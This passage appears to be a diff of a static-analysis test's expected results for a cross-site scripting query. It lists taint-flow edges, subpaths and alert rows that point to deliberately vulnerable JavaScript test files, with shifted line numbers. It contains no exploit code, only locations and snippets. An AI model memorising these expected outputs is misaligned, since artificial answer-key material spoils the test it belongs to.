provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
" ...
" | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... .search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... .search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... .search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | | typeahead.js:21:12:21:17 | target | typeahead.js:24:30:24:32 | val | provenance | | @@ -1212,18 +1212,18 @@ subpaths | optionalSanitizer.js:41:28:41:35 | tainted3 | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:41:16:41:36 | sanitiz ... inted3) | | optionalSanitizer.js:45:41:45:46 | target | optionalSanitizer.js:28:24:28:24 | x | optionalSanitizer.js:29:12:29:12 | x | optionalSanitizer.js:45:29:45:47 | sanitizeBad(target) | | tooltip.jsx:18:51:18:57 | provide [source] | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:23:38:23:43 | source | tooltip.jsx:18:51:18:59 | provide() | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | tst.js:40:16:40:44 | baz(doc ... search) | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:46:16:46:45 | wrap(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:54:16:54:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:56:16:56:45 | chop(do ... search) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | tst.js:43:10:43:31 | "
" ...
" | tst.js:58:16:58:32 | wrap(chop(bar())) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | tst.js:50:12:50:22 | s.substr(1) | tst.js:58:21:58:31 | chop(bar()) | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | tst.js:34:16:34:44 | baz(doc ... search) | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:39:16:39:45 | wrap(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:46:16:46:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:47:16:47:45 | chop(do ... search) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | tst.js:37:10:37:31 | "
" ...
" | tst.js:48:16:48:32 | wrap(chop(bar())) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | tst.js:43:12:43:22 | s.substr(1) | tst.js:48:21:48:31 | chop(bar()) | | various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | various-concat-obfuscations.js:14:24:14:28 | attrs | various-concat-obfuscations.js:15:10:15:83 | '
' | various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
') | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | | various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | various-concat-obfuscations.js:17:24:17:28 | attrs | various-concat-obfuscations.js:18:10:18:105 | '
') [ArrayElement] | various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | @@ -1289,7 +1289,7 @@ subpaths | dragAndDrop.ts:50:29:50:32 | html | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | dragAndDrop.ts:50:29:50:32 | html | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:43:22:43:54 | dataTra ... /html') | user-provided value | | dragAndDrop.ts:73:29:73:39 | droppedHtml | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | dragAndDrop.ts:73:29:73:39 | droppedHtml | Cross-site scripting vulnerability due to $@. | dragAndDrop.ts:71:27:71:61 | e.dataT ... /html') | user-provided value | | event-handler-receiver.js:2:31:2:83 | '

' | event-handler-receiver.js:2:49:2:61 | location.href | event-handler-receiver.js:2:31:2:83 | '

' | Cross-site scripting vulnerability due to $@. | event-handler-receiver.js:2:49:2:61 | location.href | user-provided value | -| express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | express.js:7:15:7:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:7:15:7:33 | req.param("wobble") | user-provided value | +| express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | express.js:6:15:6:33 | req.param("wobble") | Cross-site scripting vulnerability due to $@. | express.js:6:15:6:33 | req.param("wobble") | user-provided value | | jquery.js:7:5:7:34 | "
" | jquery.js:2:17:2:40 | documen ... .search | jquery.js:7:5:7:34 | "
" | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | jquery.js:8:18:8:34 | "XSS: " + tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:8:18:8:34 | "XSS: " + tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | jquery.js:10:5:10:40 | "" + ... "" | jquery.js:10:13:10:20 | location | jquery.js:10:5:10:40 | "" + ... "" | Cross-site scripting vulnerability due to $@. | jquery.js:10:13:10:20 | location | user-provided value | @@ -1307,7 +1307,7 @@ subpaths | jquery.js:37:25:37:37 | () => tainted | jquery.js:2:17:2:40 | documen ... .search | jquery.js:37:25:37:37 | () => tainted | Cross-site scripting vulnerability due to $@. | jquery.js:2:17:2:40 | documen ... .search | user-provided value | | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:31:40:31:61 | JSON.st ... locale) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | json-stringify.jsx:5:18:5:36 | req.param("locale") | json-stringify.jsx:35:40:35:61 | JSON.st ... jsonLD) | Cross-site scripting vulnerability due to $@. | json-stringify.jsx:5:18:5:36 | req.param("locale") | user-provided value | -| jwt-server.js:11:19:11:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:11:19:11:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | +| jwt-server.js:10:19:10:29 | decoded.foo | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:10:19:10:29 | decoded.foo | Cross-site scripting vulnerability due to $@. | jwt-server.js:7:17:7:35 | req.param("wobble") | user-provided value | | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | nodemailer.js:13:50:13:66 | req.query.message | nodemailer.js:13:11:13:69 | `Hi, yo ... sage}.` | HTML injection vulnerability due to $@. | nodemailer.js:13:50:13:66 | req.query.message | user-provided value | | optionalSanitizer.js:6:18:6:23 | target | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:6:18:6:23 | target | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | | optionalSanitizer.js:9:18:9:24 | tainted | optionalSanitizer.js:2:16:2:39 | documen ... .search | optionalSanitizer.js:9:18:9:24 | tainted | Cross-site scripting vulnerability due to $@. | optionalSanitizer.js:2:16:2:39 | documen ... .search | user-provided value | @@ -1353,7 +1353,7 @@ subpaths | tooltip.jsx:10:25:10:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:10:25:10:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | | tooltip.jsx:11:25:11:30 | source | tooltip.jsx:6:20:6:30 | window.name | tooltip.jsx:11:25:11:30 | source | Cross-site scripting vulnerability due to $@. | tooltip.jsx:6:20:6:30 | window.name | user-provided value | | tooltip.jsx:18:51:18:59 | provide() | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:18:51:18:59 | provide() | Cross-site scripting vulnerability due to $@. | tooltip.jsx:22:20:22:30 | window.name | user-provided value | -| translate.js:9:27:9:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:9:27:9:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | +| translate.js:8:27:8:50 | searchP ... 'term') | translate.js:6:16:6:39 | documen ... .search | translate.js:8:27:8:50 | searchP ... 'term') | Cross-site scripting vulnerability due to $@. | translate.js:6:16:6:39 | documen ... .search | user-provided value | | trusted-types-lib.js:2:12:2:12 | x | trusted-types.js:13:20:13:30 | window.name | trusted-types-lib.js:2:12:2:12 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:13:20:13:30 | window.name | user-provided value | | trusted-types.js:3:67:3:67 | x | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:67:3:67 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:4:20:4:30 | window.name | user-provided value | | tst3.js:4:25:4:32 | data.src | tst3.js:2:42:2:63 | window. ... .search | tst3.js:4:25:4:32 | data.src | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | @@ -1361,97 +1361,97 @@ subpaths | tst3.js:7:32:7:37 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:7:32:7:37 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | | tst3.js:9:37:9:42 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:9:37:9:42 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | | tst3.js:10:38:10:43 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:10:38:10:43 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| 